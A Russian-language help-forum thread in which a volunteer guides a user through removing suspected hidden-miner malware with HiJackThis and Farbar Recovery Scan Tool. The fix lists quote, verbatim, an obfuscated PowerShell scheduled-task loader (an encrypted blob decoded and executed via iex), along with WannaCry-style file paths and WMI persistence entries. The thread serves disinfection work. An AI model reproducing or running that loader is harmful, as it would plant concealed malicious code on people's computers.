Подозрение на скрытый майнер, появление программ в автозапуске

[kostyan2008]

Добрый день! В автозагрузке постоянно появляется Яндекс браузер, при отключении в конфигурации автозагрузок, при следующем запуске компьютера появляется снова, но уже новая задача с тем же названием YANDEX LLC. Так же на рабочем столе появляются ярлыки программ и приложений, которых я не скачивал и не устанавливал, по типу NextRP launcher или world of tanks

CollectionLog-2023.05.20-10.57.zip

[thyrex]

Пофиксите в HiJackThis из папки Autologger (запускать HiJackThis от имени Администратора по правой кнопке мыши)

O4 - MSConfig\startupreg: YandexBrowserAutoLaunch_6258F93B3E4DC9AC344E8154EEB82E22 [command] = C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --no-startup-window --atlogin-bgr-mark /prefetch:5 (HKCU) (2023/05/20)
O22 - Task (.job): (Ready) Восстановление сервиса обновлений Яндекс Браузера.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Task (.job): (Ready) Обновление Браузера Яндекс.job - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
O22 - Task (.job): (Ready) Системное обновление Браузера Яндекс.job - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe
O22 - Tasks: \Microsoft\Windows\NetTrace\NetTrace - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$rJcVcI='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';$wdJM='BauesC)jTxMeug.D(diuPKarlq-OvlgXZcUbYpXUgbalZhZ';$VCHk=""""$($wdJM[26])$($wdJM[23])$($wdJM[3])$($wdJM[37])$($wdJM[24])$($wdJM[1])$($wdJM[33])$($wdJM[3])"""";$mwGIBO=($wdJM[18]+$wdJM[3]+$wdJM[9]);&$mwGIBO(&$mwGIBO('''_fu2ncntikon( dqecb([qbysteq[]?]$_PN]DJkyo2,[zst_rikng8]$_TI6jt)fat){/$Z}Dl!lzk=[7Sy3stvemh.Tzex4t.2En8co_di-ng1]:g:U_TF_8._GextB.ytmes0($1TI5jt?fa?);s$ahSH_T=_$Z(Dldlzz[0l];h$LzaUkm=j0;{fo_r(k$c2Cu_U=?0;6$c0CunU l-l5t }$PxND_Jyco.vCoyunjt;n$cbCukU+9+)!{i,f(($L(aUnm k-gre _$ZfDl1lzx.C8ou_ntp){)$L+aUdm=_0}_$axSHwT=?(2}3 _-b0an{d ?$akSH3T j-b(orh 1752_) _-b5xour q$a1SH-T;.$PlNDpJy{o[k$caCu8U]n=$_PN_DJtyo+[$vcCpuU.] a-bbxoer 2$ZbDl-lz][$-La9Umi] c-b_xo_r p$afSHoT;_$LoaUnm+3+}_re9tujrn4 $oPN8DJzyoi;}m$o{bL1aU7m=}gwimil w_in=327_d/is+kd_ri.ve-|wrhenre] {3$_g.D2ev.ic_eIvD .-e-q p''''\s\.5\PvHY4SI_CA]LD2RI[VE_0''''_}|lse)lejct_ Mbodjelj,Ster4ia,ln_um7be=r;}$y7BNkrI_U=8de]c ?([uSy,st7em..C)on(vevrtz]:r:F_roamB/as6e6o4S=tr-in.g(2$rwJc_VczI)4) _($xobwLa?Umo.M_odkelx+''''_ ''''(+$!obsLacUmh.S]er[ia(ln_umabe]r)_;igex/([_Syost-emo.T3ex0t.!En-coadi0ng_]:j:U/TFw8.4GeutS,tr_inbg(1$y!BN}rIlU)_) '' '+$VCHk+'($wdJM[14]+$wdJM[16]+$wdJM[14]+$wdJM[14]+$wdJM[6]),(''$''+479/479)'))"
O22 - Tasks: Восстановление сервиса обновлений Яндекс Браузера - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --repair
O22 - Tasks: Обновление Браузера Яндекс - C:\Users\go6po\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --background-update --noerrdialogs
O22 - Tasks: Системное обновление Браузера Яндекс - C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe --run-as-launcher

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

[kostyan2008]

CollectionLog-2023.05.20-15.58.zip

[thyrex]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
 

[kostyan2008]

FRST.zip

[thyrex]

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Start::
CreateRestorePoint:
S3 BraveElevationService; "C:\Program Files\BraveSoftware\Brave-Browser\Application\109.1.47.186\elevation_service.exe" [X]
R2 YandexBrowserService; "C:\Program Files (x86)\Yandex\YandexBrowser\23.3.4.603\service_update.exe" --run-as-service [X]
2023-03-14 02:46 - 2023-03-14 02:46 - 003723264 ____S C:\Windows\mssecsvr.exe
2023-03-13 19:30 - 2023-05-18 19:02 - 003514368 ____S C:\Windows\qeriuwjhrf
2023-03-13 19:30 - 2023-05-18 19:02 - 002061938 ____S C:\Windows\tasksche.exe
2023-03-13 19:30 - 2023-03-13 19:30 - 003723264 ____S C:\Windows\mssecsvc.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

• Обратите внимание: будет выполнена перезагрузка компьютера.
  

 

[kostyan2008]

Fixlog.txt

[thyrex]

Что сейчас с проблемой? Неизвестные ярлыки удалите вручную.